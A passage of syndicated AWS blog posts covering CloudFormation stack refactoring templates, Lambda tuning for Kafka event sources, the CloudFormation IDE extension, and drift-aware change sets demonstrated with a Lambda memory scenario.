          GroupDescription: Security group for testing
          SecurityGroupIngress:
            - IpProtocol: tcp
              FromPort: 80
              ToPort: 80
              CidrIp: 0.0.0.0/0
    
      MyS3Bucket:
        Type: AWS::S3::Bucket
    
    Outputs:
      SecurityGroupId:
        Value: !Ref MySecurityGroup
      S3BucketName:
        Value: !Ref MyS3Bucket
  3. Create parent stack template file parent.yaml. Make sure to edit the TemplateURL with your S3 Object URL

    AWSTemplateFormatVersion: '2010-09-09'
    Description: 'Parent stack for test'
    
    Resources:
      VPCStack:
        Type: AWS::CloudFormation::Stack
        Properties:
          TemplateURL: https://s3.amazonaws.com/<Bucket-Name>/vpc.yaml
    
      ResourceStack:
        Type: AWS::CloudFormation::Stack
        Properties:
          TemplateURL: https://s3.amazonaws.com/<Bucket-Name>/resource.yaml
    
    Outputs:
      VPCStackName:
        Value: !Ref VPCStack
      ResourceStackName:
        Value: !Ref ResourceStack

     

  4. Create this new Parent stack using AWS CLI :
    aws cloudformation create-stack --stack-name ParentStack --template-body file://parent.yaml --capabilities CAPABILITY_IAM
  5. We will use stack refactor to move EC2 Security group from ResourceStack to VPCStack.
  6. Create new template file VPCStackAfter.yaml. This template now has VPC and EC2 Security group resources. Upload this template to S3 bucket
    AWSTemplateFormatVersion: '2010-09-09'
    Description: ' VPC Stack AFTER - Contains VPC and security group'
    
    Resources:
      MyVPC:
        Type: AWS::EC2::VPC
        Properties:
          CidrBlock: 10.0.0.0/16
    
      MySecurityGroup:
        Type: AWS::EC2::SecurityGroup
        Properties:
          GroupDescription: Security group for testing
          SecurityGroupIngress:
            - IpProtocol: tcp
              FromPort: 80
              ToPort: 80
              CidrIp: 0.0.0.0/0
    
    Outputs:
      VPCId:
        Value: !Ref MyVPC
      SecurityGroupId:
        Value: !Ref MySecurityGroup
  7. Create ResourceStackAfter.yaml The resource stack will only contain s3 bucket resource. Upload this template to S3 bucket
    AWSTemplateFormatVersion: '2010-09-09'
    Description: 'Resource Stack AFTER - Contains only S3 bucket'
    
    Resources:
      MyS3Bucket:
        Type: AWS::S3::Bucket
    
    Outputs:
      S3BucketName:
        Value: !Ref MyS3Bucket
  8. Navigate to CloudFormation Console and select Start stack refactor
  9. Add a description for Stack refactor:
    Add a description for Stack refactor:
  10. Choose “Update the template for an existing stack” and select child stack “ParentStack-VPCStack-12345”. Make sure to choose the child stack and not the Root/Parent stack.
    Choose “Update the template for an existing stack” and select child stack “ParentStack-VPCStack-12345”. Make sure to choose the child stack and not the Root/Parent stack.
  11. Upload the new template VPCStackAfter.yaml
    Upload the new template VPCStackAfter.yaml
  12. For Stack2, again select ‘Update the template for an existing stack’ and select to 2nd child stack “ParentStack-ResourceStack-12345”
  13. Upload the template ResourceStackAfter.yaml
    Upload the template ResourceStackAfter.yaml
  14. Review the Stack refactor. Once you have verified all the actions and details choose ‘Execute Refactor’
    Review the Stack refactor. Once you have verified all the actions and details choose ‘Execute Refactor
  15. You can verify the refactor templates.
    stack Console
  16. Lastly, update your ParentStack.yaml to reference the new child template versions in S3 bucket.
    AWSTemplateFormatVersion: '2010-09-09'
    Description: 'Parent stack for test'
    
    Resources:
      VPCStack:
        Type: AWS::CloudFormation::Stack
        Properties:
          TemplateURL: https://s3.amazonaws.com/<Bucket-Name>/VPCStackAfter.yaml
    
      ResourceStack:
        Type: AWS::CloudFormation::Stack
        Properties:
          TemplateURL: https://s3.amazonaws.com/<Bucket-Name>/ResourceStackAfter.yaml
    
    Outputs:
      VPCStackName:
        Value: !Ref VPCStack
      ResourceStackName:
        Value: !Ref ResourceStack

Best Practices

Stack Refactoring offers powerful flexibility, but a few strategic considerations will help ensure smooth operations. Test your refactoring plans in non-production environments first, particularly when working with complex dependency chains or resources that have strict ordering requirements. The preview phase becomes your primary safety mechanism—treat it as a thorough code review, examining each planned action before execution. When moving resources between stacks, pay close attention to cross-stack references. Converting direct references to export/import patterns maintains loose coupling and prevents circular dependencies. CloudFormation will automatically manage these conversions during refactoring, but understanding the resulting architecture helps you avoid introducing fragility into your infrastructure.

For scenarios where you’re emptying a source stack entirely, remember that CloudFormation requires at least one resource per stack. This makes placeholder resources like AWS::CloudFormation::WaitConditionHandle a useful temporary measure—they consume no actual AWS resources and can be safely deleted along with the stack once the refactoring completes.

Document your refactoring decisions alongside the templates themselves. Future maintainers (including yourself in six months) will appreciate understanding why resources were organized in particular ways. Include comments in your templates explaining the reasoning behind stack boundaries and resource groupings.

Consider the operational impact of your refactoring. While resources themselves remain stable, monitoring dashboards, automation scripts, or other tooling that references stack names or logical IDs may need updates. Plan these ancillary changes as part of your refactoring workflow rather than discovering them afterward.

Finally, leverage refactoring as an opportunity to improve template quality more broadly. If you’re already reorganizing resources, consider also updating documentation, standardizing naming conventions, or adding tags for better resource management.

Conclusion

CloudFormation Stack Refactoring transforms how you organize and maintain infrastructure as code, enabling stack architecture to evolve alongside applications and organizational needs. This capability provides the flexibility to restructure without the risk and complexity of traditional resource recreation approaches. Whether you’re breaking apart monolithic stacks, consolidating fragmented infrastructure, or simply renaming resources to match current conventions, Stack Refactoring lets you adapt CloudFormation organization to changing requirements without operational disruption.

To get started, visit the CloudFormation console or explore the AWS CloudFormation API reference for programmatic access patterns. Stack Refactoring is available today in all commercial AWS regions.

Brian Terry

Brian Terry

Brian Terry, Senior WW Data & AI PSA, is an innovation leader with 20+ years of experience in technology and engineering. Pursuing a Ph.D. in Computer Science at the University of North Dakota. Brian has spearheaded generative AI projects, optimized infrastructure scalability, and driven partner integration strategies. He is passionate about leveraging technology to deliver scalable, resilient solutions that foster business growth and innovation

Idriss Louali Abdou

Idriss Laouali Abdou

Idriss Laouali Abdou is a Sr. Product Manager Technical on the AWS Infrastructure-as-Code team based in Seattle. He focuses on improving developer productivity through AWS CloudFormation and StackSets Infrastructure provisioning experiences. Outside of work, you can find him creating educational content for thousands of students, cooking, or dancing.

Sanchi Halikar

Sanchi Halikar

Sanchi is a Solutions Architect supporting Enterprise customers at AWS. She helps customers design and implement cloud solutions with a focus on DevOps strategies. She specializes in Infrastructure as Code and is passionate about leveraging generative AI in software development

Jamie, AWS IaC console Front-end engineer

Jamie To

Jamie is a Front End Engineer and has been delivering console features to AWS IaC customers for the last 3 years. Outside of work, Jamie enjoys drawing and playing foosball.

Improving throughput of serverless streaming workloads for Kafka

Post Syndicated from Anton Aleksandrov original https://aws.amazon.com/blogs/compute/improving-throughput-of-serverless-streaming-workloads-for-kafka/

Event-driven applications often need to process data in real-time. When you use AWS Lambda to process records from Apache Kafka topics, you frequently encounter two typical requirements: you need to process very high volumes of records in close to real-time, and you want your consumers to have the ability to scale rapidly to handle traffic spikes. Achieving both necessitates understanding how Lambda consumes Kafka streams, where the potential bottlenecks are, and how to optimize configurations for high throughput and best performance.

In this post, we discuss how to optimize Kafka processing with Lambda for both high throughput and predictable scaling. We explore the Lambda’s Kafka Event Source Mappings (ESMs) scaling, optimization techniques available during record consumption, how to use ESM Provisioned Mode for bursty workloads, and which observability metrics you need to use for performance optimization.

Overview

To start processing records from a Kafka topic with a Lambda function, whether using Amazon Managed Streaming for Apache Kafka (Amazon MSK) or a self-managed Kafka cluster, you create an ESM: a lightweight serverless resource that consumes records from Kafka topics and invokes your function.

The scaling behavior of Kafka ESMs is based on the offset lag. This is a metric indicating the number of records in the topic that have not yet been consumed by the Lambda function. This metric typically grows when producers publish new records faster than consumers process them. As the lag grows, the Lambda service gradually adds more Kafka consumers (also known as pollers) to your ESM. To preserve ordering guarantees, the maximum number of pollers is capped by the number of partitions in the topic. Lambda also scales pollers down automatically when lag decreases.

Each ESM follows a consistent polling workflow: poll -> filter -> batch -> invoke, as shown in the following diagram. Every stage has configurable options that directly affect performance, latency, and cost.


Figure 1. ESM processing workflow.

Polling: Increasing predictability with Provisioned Mode

By default, Kafka ESM uses the on-demand polling mode. In this mode, ESM starts with one poller, automatically adds more pollers when the offset lag grows, and scales the number of pollers down as lag decreases. On-demand mode does not need upfront scaling configuration and is the lowest-cost option for steady workloads. For many applications, this behavior is sufficient: scaling up can take several minutes, but the throughput eventually catches up, and you only pay for the resources you use, such as number of invocations.

However, if your workloads are bursty and latency-sensitive, then on-demand scaling may not be fast enough and can result in a rapidly growing lag. This can be addressed by switching to Provisioned Mode, which gives you more fine-grained control to configure a minimum and maximum number of always-on pollers for your Kafka ESM. These pollers remain connected even when traffic is low, so consumption begins immediately when a spike occurs, and scaling within the configured range is faster and more predictable.

The following diagram shows the performance improvements of using the ESM in Provisioned Mode for bursty workloads. You can see that in on-demand mode it took ESM over 15 minutes to eventually catch up to the new traffic volume, while in Provisioned Mode the ESM handled the traffic increase instantly.


Figure 2. Comparing Kafka ESM on-demand and Provisioned Mode.

Best practices for using Provisioned Mode:

  • Start small: Provisioned Mode is a paid capability. AWS recommends that for smaller topics (less than 10 partitions) you start with a single provisioned poller to evaluate throughput and observe workload behavior. For larger topics, you can start with a higher number of provisioned pollers to accommodate the baseline consumption. You can adjust this configuration at any time as you learn traffic patterns and refine your performance targets.
  • Estimate throughput: A single provisioned poller can process up to 5 MB/s of Kafka data. Monitor your average record size and per-record processing time to establish a baseline for minimum and maximum pollers, then validate with real workload metrics.
  • Set a low floor and flexible ceiling: Choose a minimum number of pollers that makes sure that latency targets are met when a traffic burst occurs, then allow the ESM to scale toward a higher maximum as needed.

See Low latency processing for Kafka event sources for more information.

To summarize:

  • Use Provisioned Mode for bursty traffic, strict SLOs, or when backlogs pose downstream risk.
  • Use on-demand polling mode for steady traffic, flexible latency requirements, or when minimizing cost is the primary objective.

Filtering: Drop irrelevant records early

By default, all records from Kafka are delivered to your Lambda function. This approach is direct and flexible. Your handler code decides which records to process and which to ignore. This default behavior is highly efficient for workloads where nearly all records are valuable.

When you find yourself discarding a large portion of records in your handler code, you can use native ESM filtering capabilities to drop irrelevant records before they reach your function. You can filter early to reduce cost, free up concurrency, increase throughput, and make sure that your Lambda function spends cycles on valuable work only.

The following diagram shows the application of an ESM filter to only process telemetry that meets a specified condition.


Figure 3. ESM filtering configuration.

Batching: Processing more records per invocation

You can batch multiple Kafka records together to process more data per invocation and increase the efficiency of your Lambda functions. Larger batches help you achieve higher throughput and reduce costs by making better use of each invocation run. To get the best results, you should balance batch size and latency targets and adjust the configuration based on your workload’s specific traffic patterns and SLOs.

Lambda gives you two primary controls for configuring ESM batching behavior:

  • Batch window: This is how long the ESM waits to accumulate records before invoking your function. A shorter window produces smaller batches and more frequent invocations. A longer window (up to 5 minutes) produces larger batches and less frequent invocations.
  • Batch size: This is the maximum number of records that the ESM can accumulate before invoking your function, up to 10,000.

There’s no single setting that universally works for all workloads. Your optimal configuration depends on workload characteristics such as latency tolerance and record size. AWS recommends starting with the default values and then gradually adjusting the configuration based on your requirements. For example, you can increase the batch size while monitoring function duration, error rates, and end-to-end latency.

The following diagram shows how to configure batch window and size using Terraform:


Figure 4. ESM batch window and batch size configuration with Terraform.

The ESM invokes your function when one of the following three conditions is met:

  1. The batch window elapses.
  2. The accumulated batch reaches the configured maximum batch size.
  3. The accumulated payload approaches the 6 MB maximum invocation payload limit of Lambda.

When using higher batch window values during traffic spikes, you typically see more records-per-batch and longer function invocation durations. This is normal: larger batches can take longer to process. Always interpret the Duration metric in the context of the batch size being processed.

Invoke: Process each batch faster and more efficiently

You control how quickly each batch completes through two main factors: the efficiency of your function code and the compute resources you allocate to your functions. You can improve both to process more records per second, reduce the necessary concurrency, and lower cost.

Optimize your code: Review your function handler code to identify where you can reduce work per record. For example, eliminate redundant serialization, initialize dependencies once during function startup, and consider parallel processing within the handler (where applicable). For performance-critical workloads, you can also choose languages that compile to binary, such as Go or Rust, which typically deliver high performance with lower resource usage.

Tune compute resources: Increasing the memory function allocation proportionally increases vCPU. Use the Lambda PowerTuning tool to find the memory configuration that best balances performance and cost for your workload.

Correlate metrics: As you optimize, monitor Duration and Concurrency. You should see the concurrency drop as duration improves. That correlation confirms that your changes are improving the system throughput and efficiency.

When you combine handler optimizations with early filtering and efficient batching, even small improvements can make your pipeline noticeably faster to operate under load.

Observability drives good decisions

You can’t optimize what you can’t see. To tune your data processing pipeline, use a combination of OffsetLag, function invocation metrics, and Kafka broker metrics to understand your data processing performance. OffsetLag tells you whether your function is keeping up with incoming records, as shown in the following figure. Function metrics such as Duration, Concurrency, Errors, and Throttles show how efficiently your code is processing record batches. If you use Provisioned Mode, then you can use the Provisioned Pollers metric to track the poller capacity.


Figure 5. Kafka consumption observability with Amazon CloudWatch.

Always interpret function duration in the context of batch size. During traffic spikes, you can typically observe both duration and actual batch size increase, which is expected amortization, not a regression. For alerting, monitor lag growth, unexpected drops in invocation rate, and error spikes. With these signals in place, you can detect issues early and tune your configuration with confidence.

A sample step-by-step optimization loop

  1. Establish a clean baseline: Make your handler idempotent and batch-aware, start with a short batch window and moderate batch size. Monitor your ESM and confirm offset lag stays near zero at steady state.
  2. Filter early: Move static checks (record type, version, other custom properties) into ESM filtering and verify invoked counts drop relative to polled counts, proving the filter saves cost and concurrency.
  3. Increase batch size gradually while monitoring the duration, error rates, and latency metrics. Extend the batch window slightly if spikes cause too many invocations.
  4. Speed up the handler: Increase memory for more CPU, reduce per-record I/O, remove redundant serialization, and parallelize safely inside the batch while tracking duration and concurrency metrics together.
  5. Prove spike readiness: Replay realistic surges, monitor offset lag and drain time, and enable Provisioned Mode with a small minimum if recovery takes too long, adjusting with MB/s-per-poller estimates.
  6. Implement alerting: Watch for sustained lag growth, unexpected gaps between polled and invoked, and error spikes tied to partitions or large batches. Always read metrics in context with batch size.
  7. Re-evaluate periodically: Re-measure system throughput, confirm filter effectiveness, and retune batch and memory settings regularly as workloads evolve.

Conclusion

Optimizing Kafka streams processing with AWS Lambda necessitates understanding how ESMs work and tuning consumption components: polling, filtering, batching, and invoking. Filtering redundant records early removes unnecessary work, batching helps you process more records per invocation, and handler optimizations make sure that you make the most of the compute that you allocate. Together, these adjustments let you scale efficiently and keep offset lag under control.

When your workload is bursty, use Provisioned Mode to absorb spikes without long recovery times. With the right alerts on lag, errors, and unexpected polled versus invoked behavior, you can spot problems early and adjust before they impact users. Following this optimization guide gives you a practical way to measure, tune, and revisit your setup as traffic patterns change.

To learn more about optimizing Kafka consumption, see the AWS re:Invent 2024 session about Improving throughput and monitoring of serverless streaming workloads.

To learn more about building Serverless architectures see Serverless Land.

Announcing CloudFormation IDE Experience: End-to-End Development in Your IDE

Post Syndicated from Damola Oluyemo original https://aws.amazon.com/blogs/devops/announcing-cloudformation-ide-experience-end-to-end-development-in-your-ide/

If you’ve developed AWS CloudFormation templates, you know the drill; write YAML(YAML Ain’t Markup Language) in your IDE(Integrated Development Environment), switch to the AWS Management Console to validate, jump to documentation to verify property names. Then run CFN Lint(Cloudformation Linter) in your terminal, deploy and wait, then troubleshoot failures back in the console. This constant context switching between your IDE, AWS Console, documentation pages, and validation tools fragments your workflow and kills productivity. What should take 30 minutes often stretches into hours of iteration cycles.

Today, we’re excited to introduce the CloudFormation IDE Experience, a comprehensive solution that brings the entire CloudFormation development lifecycle into your IDE. No more context switching. No more fragmented workflows. Just one unified, intelligent development experience from authoring to deployment.

In this post, you’ll learn how the Cloudformation IDE Experience transforms your workflow with intelligent authoring, real-time validation, AWS integration, and more.

What is the CloudFormation IDE Experience?

The CloudFormation IDE Experience reimagines how you build infrastructure as code by creating an end-to-end development loop entirely within your IDE. Unlike generic YAML or JSON editors, this is a CloudFormation-first solution built specifically for infrastructure developers.

This solution covers the complete lifecycle; from intelligent authoring with smart code completion and navigation that understands CloudFormation semantics, to real-time multi-layer validation that catches issues before deployment. It provides direct AWS integration for seamless resource imports and stack visibility, monitors configuration drift between your templates and deployed resources, and includes server-side pre-deployment checks that prevent common deployment failures.
The result? A development environment that understands your infrastructure code as deeply as your IDE understands your application code.

Core Features

Quick Project Setup with CFN Init

CFN Init streamlines project setup by creating a structured CloudFormation project with environment configurations in seconds. Run “CFN Init: Initialize Project” from the Command Palette, configure your environments (dev, staging, production), and associate each with an AWS profile.

The CloudFormation Explorer displays your environments, letting you switch between them with a single click. Each environment maintains its own deployment settings and parameter values, eliminating manual configuration and ensuring consistent deployments across your infrastructure lifecycle.

Intelligent Authoring with Intelligent Code Completion

The IDE understands CloudFormation semantics and provides context-aware suggestions as you type. Only required properties appear automatically, while optional properties surface on hover, so when you add a Properties section to an EC2 VPC resource, nothing appears because it has no required properties. Create a subnet, however, and VpcId appears immediately because it’s required.

When you use !GetAtt or !Ref, the IDE knows exactly which attributes and resources are available. Navigation features like go-to-definition for logical IDs and hover tooltips let you explore complex templates without losing context. The IDE also provides full support for CloudFormation intrinsic functions and pseudo parameters.

Multi-Layer Validation System

The IDE provides comprehensive validation at multiple levels:

Static Validation (Real-time)

  • CloudFormation Guard Integration: Security and compliance checks using AWS Security pillar rules. For example, it automatically flags insecure configurations like MapPublicIpOnLaunch: true on subnets
  • CFN Lint Integration: Advanced syntax and logic validation, including overlapping CIDR block detection, resource dependency validation, and property checks beyond basic schema validation

Interactive Error Resolution
When errors occur, the IDE doesn’t just highlight them, it helps you fix them. Contextual error messages explain what’s wrong and why it matters, while one-click quick fixes automatically correct common issues like missing required properties or invalid reference formats. If you reference a non-existent resource, the IDE suggests valid alternatives from your template. Reference an invalid attribute with !GetAtt, the IDE immediately shows which attributes are actually available for that resource type.

AWS Resource Integration (CCAPI)

Import existing AWS resources directly into your templates using the Cloud Control API (CCAPI). Browse live resources and view all CloudFormation stacks in your AWS account from within the IDE. Pull resource configurations directly into your template with one click, complete with accurate property values. This transforms existing infrastructure into Infrastructure-as-Code without manual reconstruction or switching to the console to look up property values.

Server-Side Validation

Before you deploy, the IDE performs comprehensive server-side validation through AWS’s intelligent validation service that analyzes your CloudFormation templates against real-world deployment patterns and catches issues static analysis can’t detect.

The AWS’s intelligent validation service uses AWS-managed hooks to analyze your change sets before execution across three categories. Enhanced template validation covers CFN Lint blind spots like transforms and parameter values. Primary identifier conflict detection finds existing resources with the same identifiers before you attempt deployment. Resource state validation checks resource readiness ensuring, for example, that Amazon Simple Storage Service(S3) buckets are empty before deletion attempts.

This validation is based on analysis of the top CloudFormation failure patterns, helping you catch issues before they cause rollbacks or failed states.

Getting Started

Getting started with the CloudFormation IDE Experience is straightforward:

Prerequisite:

  1. Install an IDE that supports the CloudFormation extension, such as Visual Studio Code, Kiro
  2. Download the CloudFormation extension for your platform (available through the AWS Toolkit)
  3. Install the extension following the standard VS Code extension installation process

No complex dependency management or schema updates required—all configuration and updates are handled automatically.

Let’s See How It Works

Let’s walk through a practical example that demonstrates the IDE experience in action. We’ll build a simple Amazon Virtual Private Cloud (Amazon VPC) infrastructure with subnets and an S3 bucket.

Setting Up Your Project

Start by initializing a new CloudFormation project. Open the Command Palette, run “CFN Init: Initialize Project”, choose your project location, and set up environments. For this example, create a “beta” environment and associate it with your AWS development profile. The IDE creates your project structure with configuration files ready to use. You can now select your “beta” environment from the CloudFormation Explorer to ensure all deployments use the correct settings.

Figure 1: Initializing a CloudFormation project with environment configuration

Starting with Intelligent Authoring

Create a new CloudFormation template and start typing AWS::EC2::VPC. The IDE provides intelligent completions as you type.

Cloudformation IDE extension intelligent completion

Figure 2.0: Resource type auto-completion with CloudFormation-aware IntelliSense

When you add the Properties section, notice something interesting: nothing appears automatically. That’s because Amazon Elastic Compute Cloud (Amazon EC2) VPC has no required properties.

Cloudformation IDE extension doesn't suggest optional properties
Figure 2.1: No automatic suggestions for VPC properties since none are required

Hover over Properties to see all available options with their types and documentation links.

Hover information displaying optional properties and their documentation

Figure 2.2: Hover information displaying optional properties and their documentation

Add a CIDR block, then create a subnet. This time, when you type Properties, VpcId appears immediately because it’s required.

Required properties VpcID automatically suggested for EC2 Subnet
Figure 2.3: Required properties VpcID automatically suggested for EC2 Subnet

The IDE provides the resource names in your template, and when you use !GetAtt or !Ref, it knows which attributes are available for each resource type.

Type-aware completions for intrinsic functions like !GetAtt & !Ref

Figure 2.4: Type-aware completions for intrinsic functions like !GetAtt & !Ref

Real-Time Validation in Action

As you continue building, add MapPublicIpOnLaunch: true to make a public subnet. Immediately, a blue squiggly line appears.

CloudFormation Guard warning highlighted in real-time

Figure 3: CloudFormation Guard warning highlighted in real-time

Hovering reveals a CloudFormation Guard warning from the AWS Security pillar rules: this configuration isn’t recommended for security compliance.

Security compliance warning with detailed explanation

Figure 3.1: Security compliance warning with detailed explanation

Create a second subnet by copying the first, but now red squiggly lines appear. CFN Lint has detected overlapping CIDR blocks between your two subnets – an issue that would fail during deployment. You can fix it immediately with the contextual information provided.

CFN Lint error detection for overlapping CIDR blocks providing detailed error information helping you resolve the issue quickly
Figure 3.2: CFN Lint error detection for overlapping CIDR blocks providing detailed error information helping you resolve the issue quickly

Importing Existing Resources

Now you need an S3 bucket. Instead of writing it from scratch, open the Resource Explorer panel on the left. Using CCAPI integration, you can see all your existing AWS resources. Select an S3 bucket and click “Import resource state”. The IDE pulls in the complete resource configuration with all properties already set. You can now iterate on this resource without needing to remember or look up all the configuration details.

Automatically imported resource configuration from live AWS resources

Figure 4: Automatically imported resource configuration from live AWS resources

Developer Experience Benefits

The CloudFormation IDE Experience delivers measurable improvements across productivity and quality:

Productivity Gains:

  • Reduced context switching: Keep your entire workflow in one place
  • Faster iteration cycles: Catch and fix issues in seconds, not minutes or hours
  • Shift-left validation: Identify problems before deployment, not after
  • Intelligent assistance: Spend less time in documentation, more time building

Quality Improvements:

  • Proactive error prevention: Multi-layer validation catches issues early
  • Security by default: Built-in compliance checks from CloudFormation Guard
  • Best practice enforcement: Automated guidance aligned with AWS recommendations
  • Deployment confidence: Pre-deployment validation reduces rollback scenarios

What previously took hours of troubleshooting and multiple deployment attempts now becomes a confident 30-minute development cycle.

“I will definitely use these features; they help to reduce the feedback loop and speed up the development of IaC templates.” – AWS Community Builder

Things to Know

Platform Support

The CloudFormation IDE Experience is available for:

  • Visual Studio Code: Full feature support
  • Kiro: Full feature support
  • Cursor: Full feature support
  • JetBrains IDEs: Complete integration across the IntelliJ family (Fast Follow)
  • Operating Systems: macOS (ARM), Linux (x64) and Windows(…)

Conclusion

The CloudFormation IDE Experience eliminates the context switching that fragments your workflow. Write, validate, and deploy all from one environment. What used to take hours of iteration now takes minutes.

Ready to get started? Install the CloudFormation extension from the AWS Toolkit for VS Code and experience the difference. For detailed setup instructions and feature documentation, see the CloudFormation IDE Experience guide.

About the Authors:

Damola Oluyemo

Damola Oluyemo is a Solutions Architect at Amazon Web Services focused on Enterprise customers. He helps customers design cloud solutions while exploring the potential of Infrastructure as Code and generative AI in software development.

Jehu Gray

Jehu Gray is a Prototyping Architect at Amazon Web Services where he helps customers design solutions that fits their needs. He enjoys exploring what’s possible with IaC.

Safely Handle Configuration Drift with CloudFormation Drift-Aware Change Sets

Post Syndicated from JJ Lei original https://aws.amazon.com/blogs/devops/safely-handle-configuration-drift-with-cloudformation-drift-aware-change-sets/

Introduction

Is configuration drift preventing you from accessing the speed, safety, and governance benefits of AWS CloudFormation for infrastructure management? Configuration drift occurs when cloud resources are modified outside of CloudFormation, leading to a mismatch in the actual state and template definition of resources. Drift tends to accumulate from infrastructure changes that engineers make via the AWS Management Console to resolve production incidents or troubleshoot malfunctioning applications. Drift can cause unexpected changes during subsequent IaC deployments or leave resources in a non-compliant state. Unresolved drift can lead to cost increases when resources are over-provisioned outside of template definitions, or compliance violations that may result in audit penalties. Additionally, drift makes it hard to reproduce applications for testing or disaster recovery.

CloudFormation now offers drift-aware change sets that allow you to safely handle configuration drift and keep your infrastructure in sync with your templates. In this post, we will explore the process of leveraging drift-aware change sets to resolve common scenarios in which drift impacts the availability or security of your application.

Solution Overview

Drift-aware change sets are a type of CloudFormation change sets that can bring drifted resources in line with template definitions and preview the required changes to actual infrastructure states before deployment. Drift-aware change sets surface a three-way comparison of your new template, actual resource states, and previous template before deployment, allowing you to prevent unexpected overwrites of drift. Additionally, drift-aware change sets offer you a systematic mechanism to restore drifted resources to approved template definitions, strengthening the reproducibility and compliance posture of applications. You can create drift-aware change sets either from the CloudFormation Management Console or from the AWS CLI or SDK by passing the --deployment-mode REVERT_DRIFT parameter to the CreateChangeSet API.

Prerequisites

AWS CLI latest version with CloudFormation permissions configured.

AWS Identity and Access Management (IAM) permissions required: Permissions to create and manage CloudFormation stacks, AWS Lambda functions, Security Groups, Amazon Simple Storage Service (Amazon S3) buckets, and IAM roles. PowerUserAccess or Administrator access recommended for testing.

• Test environment (non-production AWS account recommended)

• Basic CloudFormation knowledge (stacks, templates, change sets)

Important Note: These sample templates are provided for educational purposes only and should not be used in production environments without proper security review and testing. You are responsible for testing, securing, and optimizing these templates based on your specific quality control practices and standards. Deploying these templates may incur AWS charges for creating or using AWS resources. Work with your security and legal teams to meet your organizational security, regulatory, and compliance requirements before any production deployment.

Scenario 1: Prevent Dangerous Overwrites

This scenario demonstrates how drift-aware change sets prevent dangerous overwrites when Lambda function memory is increased outside of CloudFormation during an outage, and a subsequent template update could accidentally reduce memory, causing performance issues.

Story: Your team deploys a Lambda function with 128 MB memory via CloudFormation. During a production outage, an engineer increases the memory to 512 MB through the Lambda Console to resolve performance issues. Later, another developer updates the template to 256 MB for a code change, unaware of the console modification. Without drift-aware change sets, CloudFormation would unexpectedly reduce memory from 512 MB to 256 MB—potentially causing the outage to recur.

User journey: Create stack with 128MB => Increase memory to 512MB via console during outage => Create drift-aware change set with 256MB template => Review three-way comparison showing dangerous memory reduction => Cancel change set to prevent outage => Update template to match production state (512MB) => Create and execute drift-aware change set with updated template (512MB) to resolve drift

Scenario Flow

1. Create Stack

Deploy CloudFormation stack with Lambda function (128 MB memory).

Figure 1

CloudFormation stack “lambda-memory-drift-test” successfully deployed with CREATE_COMPLETE status

2. Emergency Memory Increase (Console)

Manually increase Lambda memory to 512 MB through AWS Console (simulating emergency performance fix during outage).

Figure 2

Initial Lambda function showing 128 MB memory as configured in template

Figure 3

Lambda memory increased to 512 MB through console during outage, creating drift from template

3. Create Drift-Aware Change Set

Create change set with 256 MB template using drift-aware mode to reveal the dangerous memory reduction.

Figure 4

CloudFormation console showing the new “Drift aware change set” option selected. This compares the new template with the live state of your stack and shows changes to drifted resources before deployment, unlike standard change sets that only compare templates.

aws cloudformation create-change-set \
--stack-name lambda-memory-drift-test \
--change-set-name detect-memory-overwrite \
--template-body file://lambda-memory-drift-scenario-256mb.yaml \
--deployment-mode REVERT_DRIFT \
--capabilities CAPABILITY_IAM \
--region us-east-1

4. Review Change Set – The Critical Three-Way Comparison

Examine the drift-aware change set to see the dangerous memory reduction that would occur.

Figure 5

Critical insight revealed: The change set shows Live resource state (512 MB) vs Proposed resource state (256 MB), revealing a dangerous memory reduction that would impact performance.

Figure 6: view drift

Drift analysis: Clicking “View drift” reveals the complete picture – Previous template (128 MB) vs Live resource state (512 MB). This shows the live state has 4x more memory than the original template, indicating emergency changes were made during the outage that must be preserved.

Key Insight: The drift-aware change set reveals that:

  • Previous template: 128 MB (original deployment)
  • Live resource state: 512 MB (emergency change during outage)
  • Proposed template: 256 MB (new deployment)

This would cause a dangerous reduction from 512 MB to 256 MB, potentially recreating the original performance issue. Without drift-aware change sets, this critical information would be hidden.

5. Recreate Drift-aware Change Set with Updated Template (512MB) to Resolve Drift

Update the template to match the live production state (512 MB) and create a new drift-aware change set to safely resolve the drift.

Figure 7

Resolution confirmed: The drift-aware change set shows both Live resource state and Proposed resource state at 512 MB, with change set action ” Sync with live”. This verifies that the updated template now matches production, preventing the dangerous memory reduction and safely resolving the drift without impacting performance.

CloudFormation Templates

Initial Template (128 MB):

Resources:
  DriftTestFunction:
    Type: AWS::Lambda::Function
    Properties:
      Runtime: python3.9
      Handler: index.lambda_handler
      MemorySize: 128
      ReservedConcurrentExecutions: 5
      Role: !GetAtt LambdaExecutionRole.Arn
      Code:
        ZipFile: |
          def lambda_handler(event, context):
              return {'statusCode': 200, 'body': 'Hello!'}
  LambdaExecutionRole:
    Type: AWS::IAM::Role
    Properties:
      AssumeRolePolicyDocument:
        Statement:
          - Effect: Allow
            Principal:
              Service: lambda.amazonaws.com
            Action: sts:AssumeRole
      ManagedPolicyArns:
        - arn:aws:iam::aws:policy/service-role/AWSLambdaBasicExecutionRole

Updated Template (256 MB – lambda-memory-drift-scenario-256mb.yaml):

Resources:
  DriftTestFunction:
    Type: AWS::Lambda::Function
    Properties:
      Runtime: python3.9
      Handler: index.lambda_handler
      MemorySize: 256
      ReservedConcurrentExecutions: 5
      Role: !GetAtt LambdaExecutionRole.Arn
      Code:
        ZipFile: |
          def lambda_handler(event, context):
              return {'statusCode': 200, 'body': 'Hello!'}
  LambdaExecutionRole:
    Type: AWS::IAM::Role
    Properties:
      AssumeRolePolicyDocument:
        Statement:
          - Effect: Allow
            Principal:
              Service: lambda.amazonaws.com
            Action: sts:AssumeRole
      ManagedPolicyArns:
        - arn:aws:iam::aws:policy/service-role/AWSLambdaBasicExecutionRole

CLI Commands

  1. Create stack:
aws cloudformation create-stack --stack-name lambda-memory-drift-test --template-body file://lambda-memory-drift-scenario.yaml --capabilities CAPABILITY_IAM --region us-east-1
  1. Get function name:
aws cloudformation describe-stack-resources --stack-name lambda-memory-drift-test --logical-resource-id DriftTestFunction --query 'StackResources[0].PhysicalResourceId' --output text --region us-east-1
  1. Create drift-aware change set:
aws cloudformation create-change-set --stack-name lambda-memory-drift-test --change-set-name detect-memory-overwrite --template-body file://lambda-memory-drift-scenario-256mb.yaml --deployment-mode REVERT_DRIFT --capabilities CAPABILITY_IAM --region us-east-1
  1. Describe change set:
aws cloudformation describe-change-set --change-set-name detect-memory-overwrite --stack-name lambda-memory-drift-test --region us-east-1

Scenario 2: Remediate Unauthorized Changes

This scenario demonstrates how drift-aware change sets systematically remediate unauthorized changes when a developer adds temporary debugging rules to a security group but forgets to remove them, creating a compliance violation.

